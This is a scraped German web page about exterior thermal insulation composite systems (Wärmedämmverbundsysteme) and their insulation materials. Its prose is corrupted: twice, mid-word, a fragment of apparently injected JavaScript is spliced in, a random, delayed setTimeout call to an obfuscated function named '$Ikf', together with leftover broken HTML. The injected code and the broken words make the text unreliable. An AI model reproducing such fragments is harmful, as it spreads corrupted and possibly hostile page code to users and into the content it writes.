Dämmung

top“>

to_post/preview/id–302″ alt=““ />

top“> top“>

Verbundsysteme mit optimaler Dämmfunktion!

Wärmedämmverbundsysteme (WDVS) sind Systeme mit aufeinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander abgestimmten Baustoffen für die außenseitige Montage an Wänden von Gebäuden. Das Kernstück, das die grundlegenden Eigenschaften des Systems bestimmt, ist der Dämmstoff.

Dieser besteht aus Holzfaser, Kork, Hanf, Schilf, Gras, Perlite, Mineralwolle, Mineralschaum, Polystyrol-Hartschaum, Polystyrolpartikelschaum, Polystyrolextruderschaum, Polyurethan-Hartschaum oder auch Vakuumdämmplatten. Je nach verwendetem Dämmstoff kommen unterschiedliche Putze und Putzstärken zum Einsatz.

Sie müssen hohen Ansprüchen genügen. Viele Materialien kommen schon aufgrund ihres Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andverhaltens oder ihres Wasseraufnahmevermögens nicht infrage.